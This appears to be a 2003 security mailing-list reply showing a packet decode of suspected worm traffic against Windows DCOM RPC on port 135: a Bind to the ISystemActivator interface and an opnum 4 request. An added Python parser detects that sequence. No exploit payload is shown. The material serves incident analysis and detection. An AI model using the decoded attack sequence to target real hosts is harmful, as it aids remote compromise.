Message-ID: <ILEPILDHBOLAHHEIMALBEEPGGGAA.jasonc@science.org>
From: jasonc at science.org (Jason Coombs)
Subject: DCOM
Is this what you're seeing?
6 66.859375 BEFC20000500 XEROX 000000 MSRPC c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 8687500 microseconds
Frame: Frame number: 6
Frame: Total frame length: 126 bytes
Frame: Capture frame length: 126 bytes
Frame: Frame data: Number of data bytes remaining = 126 (0x007E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 126 (0x007E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 112 (0x0070)
IP: ID = 0x1C04; Proto = TCP; Len: 112
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 112 (0x70)
IP: Identification = 7172 (0x1C04)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0138
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 92 (0x005C)
TCP: .AP..., len: 72, seq:3551092873-3551092945, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092873 (0xD3A96089)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xC46A
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 72 (0x0048)
MSRPC: c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 72 (0x48)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 0 (0x0)
MSRPC: Presentation Context List
MSRPC: Number of Context Elements = 1 (0x1)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Number of Transfer Syntaxs = 1 (0x1)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Abstract Interface Version = 0 (0x0)
MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)
7 66.859375 XEROX 000000 BEFC20000500 MSRPC c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0 WIN2KDEV 67.30.174.214 IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 0 microseconds
Frame: Frame number: 7
Frame: Total frame length: 114 bytes
Frame: Capture frame length: 114 bytes
Frame: Frame data: Number of data bytes remaining = 114 (0x0072)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : BEFC20000500
ETHERNET: .......0 = Individual address
ETHERNET: ......1. = Locally administered address
ETHERNET: Source address : 000005000000
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 114 (0x0072)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 100 (0x0064)
IP: ID = 0x1E94; Proto = TCP; Len: 100
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 100 (0x64)
IP: Identification = 7828 (0x1E94)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFBB3
IP: Source Address = 67.30.171.57
IP: Destination Address = 67.30.174.214
IP: Data: Number of data bytes remaining = 80 (0x0050)
TCP: .AP..., len: 60, seq: 188699400-188699460, ack:3551092945, win: 8088, src: 135 dst: 3843
TCP: Source Port = Location Service
TCP: Destination Port = 0x0F03
TCP: Sequence Number = 188699400 (0xB3F5308)
TCP: Acknowledgement Number = 3551092945 (0xD3A960D1)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8088 (0x1F98)
TCP: Checksum = 0xEDFA
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 60 (0x003C)
MSRPC: c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind Ack
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 60 (0x3C)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 37081 (0x90D9)
MSRPC: Secondary Address
MSRPC: Secondary Address Length = 4 (0x4)
MSRPC: Secondary Address Port
MSRPC: Padding Byte(s)
MSRPC: Result List
MSRPC: Number of Results = 1 (0x1)
MSRPC: Reserved = 0 (0x0)
MSRPC: Reserved 2
MSRPC: Presentation Context Results
MSRPC: Result = Acceptance
MSRPC: Reason = Reason not specified
MSRPC: Transfer Syntax
MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)
8 67.281250 BEFC20000500 XEROX 000000 MSRPC c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.827
Frame: Time delta from previous physical frame: 421875 microseconds
Frame: Frame number: 8
Frame: Total frame length: 1414 bytes
Frame: Capture frame length: 1414 bytes
Frame: Frame data: Number of data bytes remaining = 1414 (0x0586)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 1414 (0x0586)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 1400 (0x0578)
IP: ID = 0x1C05; Proto = TCP; Len: 1400
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 1400 (0x578)
IP: Identification = 7173 (0x1C05)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFC2E
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 1380 (0x0564)
TCP: .A...., len: 1360, seq:3551092945-3551094305, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092945 (0xD3A960D1)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x10 : .A....
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....0... = No Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0x9219
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 1360 (0x0550)
MSRPC: c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 1704 (0x6A8)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 229 (0xE5)
MSRPC: Bind Frame Number = 6 (0x6)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Allocation Hint = 1680 (0x690)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 4 (0x4)
MSRPC: Stub Data
9 67.390625 BEFC20000500 XEROX 000000 TCP .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.936
Frame: Time delta from previous physical frame: 109375 microseconds
Frame: Frame number: 9
Frame: Total frame length: 398 bytes
Frame: Capture frame length: 398 bytes
Frame: Frame data: Number of data bytes remaining = 398 (0x018E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 398 (0x018E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 384 (0x0180)
IP: ID = 0x1C06; Proto = TCP; Len: 384
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 384 (0x180)
IP: Identification = 7174 (0x1C06)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0026
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 364 (0x016C)
TCP: .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551094305 (0xD3A96621)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xDBD3
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 344 (0x0158)
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Paul Marsh
Sent: Monday, August 11, 2003 8:56 AM
To: Full-Disclosure (E-mail)
Subject: [Full-Disclosure] DCOM
Looks like a worm has been released, check your logs.
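Added example for readers of this thread, not code from the original post or from Network Monitor: a small Python parser for the DCE/RPC connection-oriented header that decodes the Bind (frame 6) and Request (frame 8) shown in the capture and flags, from a defender's side, the Bind to UUID 000001A0-0000-0000-C000-000000000046 followed by a Request for opnum 4, plus the fragment that claims 1704 bytes in a 1360-byte segment and is completed in frame 9. The sample bytes are rebuilt from the decoded field values above (the request stub is dummy filler, not the captured payload), and the name ISystemActivator for that UUID is my identification, not something the post states.

```python
"""DCE/RPC connection-oriented PDU parser with a Bind -> Request detector.
Added example, not from the original post. Sample PDUs are rebuilt from the
field values decoded in frames 6 and 8; the request stub is dummy filler."""
import struct
import uuid

PTYPE_REQUEST, PTYPE_BIND = 0x00, 0x0B  # packet types, DCE 1.1 RPC spec (C706) 12.6
# UUID the capture binds to; the name ISystemActivator is my identification of
# this well-known UUID, the page itself only shows the value.
ISYSTEMACTIVATOR = uuid.UUID("000001A0-0000-0000-C000-000000000046")


def parse_pdu(data):
    """Decode the 16-byte common header plus the Bind or Request body.
    'truncated' is set when the payload is shorter than frag_len claims (frame 8
    claims 1704 bytes in a 1360-byte segment; the remaining 344 arrive in frame 9)."""
    if len(data) < 16 or data[0] != 5:
        raise ValueError("not a DCE/RPC v5 connection-oriented PDU")
    ptype, flags = data[2], data[3]
    # High nibble of the data representation selects byte order: 1 = little-endian.
    end = "<" if data[4] >> 4 == 1 else ">"
    frag_len, auth_len, call_id = struct.unpack(end + "HHI", data[8:16])
    pdu = {"ptype": ptype, "flags": flags, "frag_len": frag_len, "auth_len": auth_len,
           "call_id": call_id, "truncated": frag_len > len(data)}
    if ptype == PTYPE_BIND and len(data) >= 52:
        max_xmit, max_recv, assoc = struct.unpack(end + "HHI", data[16:24])
        ctx_id, n_syntax = struct.unpack(end + "HB", data[28:31])
        pdu.update(max_xmit=max_xmit, max_recv=max_recv, assoc_group=assoc,
                   n_ctx=data[24], ctx_id=ctx_id, n_syntax=n_syntax,
                   # DCE UUIDs store time_low/mid/hi little-endian, hence bytes_le.
                   abstract_uuid=uuid.UUID(bytes_le=data[32:48]),
                   abstract_ver=struct.unpack(end + "I", data[48:52])[0])
    elif ptype == PTYPE_REQUEST and len(data) >= 24:
        alloc_hint, ctx_id, opnum = struct.unpack(end + "IHH", data[16:24])
        pdu.update(alloc_hint=alloc_hint, ctx_id=ctx_id, opnum=opnum)
    return pdu


def flag_stream(pdus):
    """Findings for one client->server stream to port 135, in PDU order: a Bind to
    ISystemActivator, a Request for opnum 4 on that context, and any fragment that
    outgrows its TCP segment, so the stub must be reassembled before inspection."""
    findings, bound = [], {}
    for p in pdus:
        if p["ptype"] == PTYPE_BIND and p.get("abstract_uuid") == ISYSTEMACTIVATOR:
            bound[p["ctx_id"]] = p["abstract_uuid"]
            findings.append("bind to ISystemActivator, call 0x%X" % p["call_id"])
        elif p["ptype"] == PTYPE_REQUEST and bound.get(p.get("ctx_id")) == ISYSTEMACTIVATOR:
            if p["opnum"] == 4:
                findings.append("opnum 4 on ISystemActivator, frag_len %d" % p["frag_len"])
            if p["truncated"]:
                findings.append("fragment spans TCP segments, reassemble before inspecting")
    return findings


# Frame 6 Bind (72 bytes), rebuilt from the decoded fields above.
BIND_PDU = bytes.fromhex(
    "05 00 0b 03 10000000 4800 0000 7f000000"       # v5.0 Bind, flags 3, len 72, call 127
    "d016 d016 00000000"                            # max xmit/recv 5840, assoc group 0
    "01 00 0000" "0100 01 00"                       # one context: id 1, one transfer syntax
    "a0010000 0000 0000 c000000000000046 00000000"  # abstract syntax: ISystemActivator v0
    "045d888a eb1c c911 9fe808002b104860 02000000"  # transfer syntax: NDR v2
)
# Frame 8 Request header (24 bytes) plus constructed filler standing in for the stub.
REQUEST_PDU = bytes.fromhex(
    "05 00 00 03 10000000 a806 0000 e5000000"       # v5.0 Request, len 1704, call 229
    "90060000 0100 0400"                            # alloc hint 1680, context 1, opnum 4
) + bytes(16)

if __name__ == "__main__":
    for finding in flag_stream([parse_pdu(BIND_PDU), parse_pdu(REQUEST_PDU)]):
        print(finding)
```

Run against real traffic, the Request's stub would only be inspectable after the 1360- and 344-byte segments are reassembled, which is exactly what the truncated flag is there to force.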
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html